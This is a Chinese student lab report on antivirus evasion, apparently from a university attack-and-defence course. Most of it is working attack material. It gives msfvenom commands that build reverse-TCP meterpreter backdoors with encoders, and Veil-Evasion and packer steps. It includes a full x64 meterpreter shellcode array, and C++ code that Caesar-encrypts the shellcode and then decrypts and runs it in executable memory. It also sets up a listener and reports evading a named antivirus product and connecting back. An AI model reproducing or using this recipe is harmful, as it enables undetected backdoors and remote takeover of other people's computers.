# 20222309 2024-2025-1 《网络与系统攻防技术》实验三实验报告

标签：exe x41 x89 xff x48 2024 2025 20222309 x00

1.实验内容

1、实践内容

(1)正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧
(2)通过组合应用各种技术实现恶意代码免杀
(3)用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

2、实验要求

(1)杀软是如何检测出恶意代码的？
基于特征码检测，基于行为监测，基于启发式分析，基于云查杀，基于机器学习和人工智能技术。
(2)免杀是做什么？
免杀，即反杀毒技术，是指通过各种技术手段使恶意软件（如病毒、木马、后门程序等）能够躲避杀毒软件的检测和查杀。恶意软件作者希望他们的恶意程序能够在目标系统中长时间存在而不被发现，以便持续进行非法活动，如窃取敏感信息、控制目标系统等。如果恶意软件能够躲避杀毒软件的检测，就可以更广泛地传播，感染更多的系统，从而实现攻击者的恶意目的。
(3)免杀的基本方法有哪些？
代码混淆，加密技术，加壳技术，对抗行为检测，多态和变形技术。

2.实验过程

1. 使用msfvenom生成jar等文件。

查看 msfvenom 支持的所有输出格式：输入msfvenom --list formats；

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.84 LPORT=2309 -f exe > 20222309zyq.exe，生成payload；

查看 msfvenom 支持的所有编码方式：输入msfvenom --list encoders；

使用编码器对payload进行编码，输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.3.84 LPORT=2309 -f exe > 20222309zyq-2.exe；

多次编码：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.3.84 LPORT=2309 -f exe > 20222309zyq-3.exe；

选择一个适用于Java环境的payload来生成jar文件：msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.3.84 LPORT=2309 -f jar > 20222309zyq-4.jar；

使用编码器对payload进行编码：msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.3.84 LPORT=2309 -e x86/shikata_ga_nai -i 10 -f jar > 20222309zyq-5.jar；

生成一个反向 TCP 连接的 Linux elf 可执行文件：msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.3.84 LPORT=2309 -f elf > 20222309zyq-6.elf

使用编码器对payload进行编码：msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.3.84 LPORT=2309 -e x86/shikata_ga_nai -i 10 -f elf > 20222309zyq-7.elf

将生成的文件直接传输到主机上，然后打开VirusTotal的网址进行监测

监测结果显示，编码以及多次编码后的后门程序被检测出的概率是差不多的，由此可知编码对后门程序的隐藏作用不大，在使用java以及反向tcp连接后，指数会明显下降。

2．使用veil工具

安装veil，需要保持虚拟机是联网状态，依次输入以下命令：

mkdir -p ~/.cache/wine
cd ~/.cache/wine
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
sudo apt-get install libncurses5*
sudo apt-get install libavutil55*
sudo apt-get install gcc-mingw-w64*
dpkg --add-architecture i386
sudo apt-get update
sudo apt-get install wine32

安装veil，输入apt-get install veil

进入setup所在文件夹cd /usr/share/veil/config/
打开setup，vim setup.sh
把下载地址换成https://gitee.com/spears/VeilDependencies.git

运行veil进行安装

报错，输入sudo /usr/share/veil/config/setup.sh --force --silent，继续安装

完成安装，输入veil

输入use evasion ，进入Evil—Evasion

输入list，查看可使用的payload类型

输入use 7，使用c/meterpretermrev_tcp.py

打开新终端，输入ifconfig查看虚拟机ip地址为192.168.1.122

之后在原来的终端输入

set LHOST 192.168.1.122	
set LPORT 2309	
generate
20222309veil；

输入cd /var/lib/veil/output/compiled/，进入文件夹，输入ls查看生成的.exe可执行文件

将20222309veil.exe放进主机，然后使用VirusTotal检测

3、使用C + shellcode编程

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.122 LPORT=2309 -f c

新建202222309.c文件，并进行编辑

输入i686-w64-mingw32-g++ 20222309.c -o 20222309.exe，用ls查看文件

将20222309.exe放入主机，然后使用VirusTotal检测

4、加壳

upx加壳：输入upx 20222309.exe -o upx20222309.exe

hyperion加壳：
输入cp upx20222309.exe /usr/share/windows-resources/hyperion；
输入cd /usr/share/windows-resources/hyperion进入文件夹；
输入ls查看生成的可执行文件；
输入wine hyperion.exe -v upx20222309.exe upx20222309hy.exe

将upx20222309.exe、upx20222309hy.exe文件移入，用VirusTotal检测

5、通过组合应用各种技术实现恶意代码免杀

kali虚拟机中通过msfvenom生成Shellcode数组，代码如下msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.119 LPORT=2309 -f c；

将buf[]中的内容复制，新建20222309.cpp文件，输入代码，代码功能为将复制内容放入shellcode[]数组中，通过代码将shellcode进行凯撒加密，将密文输入到20222309.txt文件中
代码如下

#include <stdio.h>
#include<string.h>
void caesarEncrypt(unsigned char *data, size_t length, int shift) {
	for (size_t i = 0; i < length; i++) {
		data[i]= (data[i] + shift) & 0xFF;
	}
}
int main( ) {
	unsigned char shellcode[] = 
	"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
	"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
	"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x4d\x31\xc9\x48\x0f"
	"\xb7\x4a\x4a\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
	"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x41"
	"\x51\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"
	"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0"
	"\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49"
	"\x01\xd0\xe3\x56\x4d\x31\xc9\x48\xff\xc9\x41\x8b\x34\x88"
	"\x48\x01\xd6\x48\x31\xc0\x41\xc1\xc9\x0d\xac\x41\x01\xc1"
	"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"
	"\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
	"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"
	"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83"
	"\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
	"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00"
	"\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49"
	"\x89\xe5\x49\xbc\x02\x00\x09\x05\xc0\xa8\x01\x77\x41\x54"
	"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5"
	"\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b"
	"\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31"
	"\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41"
	"\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58"
	"\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
	"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00"
	"\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58"
	"\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00"
	"\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68"
	"\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba"
	"\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
	"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9"
	"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68"
	"\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f"
	"\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49"
	"\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48"
	"\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
	"\xf0\xb5\xa2\x56\xff\xd5";
	int shift =3;
	printf("original: ");
	for (size_t i = 0; i < 510; i++) {
		printf("\\x%02x",shellcode[i]);
	}
	printf("\n");
	caesarEncrypt(shellcode,510,shift); 
	printf("Encrypted:");
	for (size_t i =0;i< 510; i++){
		printf("\\x%02x",shellcode[i]); 
	}
	printf("\n");
	FILE *file = fopen("20222309.txt", "w");
	if (file != NULL) {
	    for (size_t i = 0; i < 510; i++) {
	        fprintf(file, "\\x%02x", shellcode[i]);
	    }
	    fprintf(file, "\n");
	    fclose(file);
	} 
	else {
		printf("Error opening file!\n");
	}
	return 0;
}

运行结束后，20222309.txt内容如下

新建20222309-2.cpp文件，输入代码，代码功能为读取20222309.txt文件中的内容到shellcode[]数组中，并进行解密，再运行shellcode；
代码如下：

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void caesarDecrypt(unsigned char *data, size_t length, int shift) {
    for (size_t i = 0; i < length; i++) {
        data[i] = (unsigned char)((data[i] - shift + 256) % 256);
    }
}

int main() {
    int shift = 3; 
    unsigned char shellcode1[511]; 
    char line[1024]; 
    FILE *file = fopen("20222309.txt", "r");
    if (file == NULL) {
        perror("Error opening file");
        return 1;
    }
    size_t length = 0;
    while (fgets(line, sizeof(line), file)) {
        for (size_t i = 0; line[i] != '\0' && line[i] != '\n'; i += 1) {
            if (sscanf(&line[i], "\\x%02hhx", &shellcode1[length]) == 1) {
                length++;
            }
        }
    }
    fclose(file);
    caesarDecrypt(shellcode1, length, shift);
    LPVOID exec = VirtualAlloc(0, sizeof shellcode1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, shellcode1, sizeof shellcode1);
    ((void(*)())exec)();
    return 0;
}

将两个exe文件放在桌面且运行发现可以与杀软共生，但是在运行时依旧会跳出提示存在安全危险是否信任，成功免杀的原因是因为使用了代码混淆和加密技术导致杀软无法识别。

杀软为联想电脑管家，版本为5.1.80.9023

6、用电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本。

在kali中使用msfconsole指令进入msf控制台，对msf控制台进行配置；
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.119
set LPORT 2309
输入run；

在主机运行20222309-2.exe，返回到kali，输入sysinfo，查看版本

3.问题及解决方案

问题1：安装veil的时候安装失败，查看原因报空间不足。
问题1解决方案：查询网络，用apt-get autoclen,apt-get clean,apt-get autoremove,清理内存后可正常下载
问题2：在后续加壳后，又出现了空间不足导致无法加壳，且再次使用上述命令也无效
问题2解决方案：查询网络，可以扩展磁盘，于是关闭虚拟机扩展磁盘，结果再次进入由于空间不足无法进入可视化界面，而gparted只能在可视化界面使用，然后使用命令行重新进行磁盘分配，结果因为命令使用错误，导致所有磁盘都被删掉，然后创建新的磁盘分区也失败，最后导致虚拟机直接崩了，最后重新创建了一个新的虚拟机，且在一开始将虚拟机内存设置到40g。
问题3：最后一步，杀软开启回连的时候发现无法连接。
问题3解决方案：重新查询ip后发现ip地址发生改变。

4.学习感悟、思考等

在本次实验我再次加深了对于msf的使用的理解，温习了对于shellcode的使用，并且在这次实验中，也学会了新工具veil的使用，学习使用veil加壳和使用多种组合技术实现恶意代码免杀，从攻击的角度考虑防范，让我加强对于恶意软件的防范意思。虽然在这次实验中我只使用了代码混淆以及加密技术来实现免杀，但在实验的过程中查询资料时对于其他技术也有了些了解。同时我在实验中发现虽然能够在实验过程中初步实现杀软共生，但是在程序运行时，依旧会被杀毒软件提示危险，也体现了现在网络安全保护体系也卓有成效，增添我对于维护网络安全的信心。

标签：exe,x41,x89,xff,x48,2024,2025,20222309,x00
From： https://www.cnblogs.com/zhengyq/p/18488276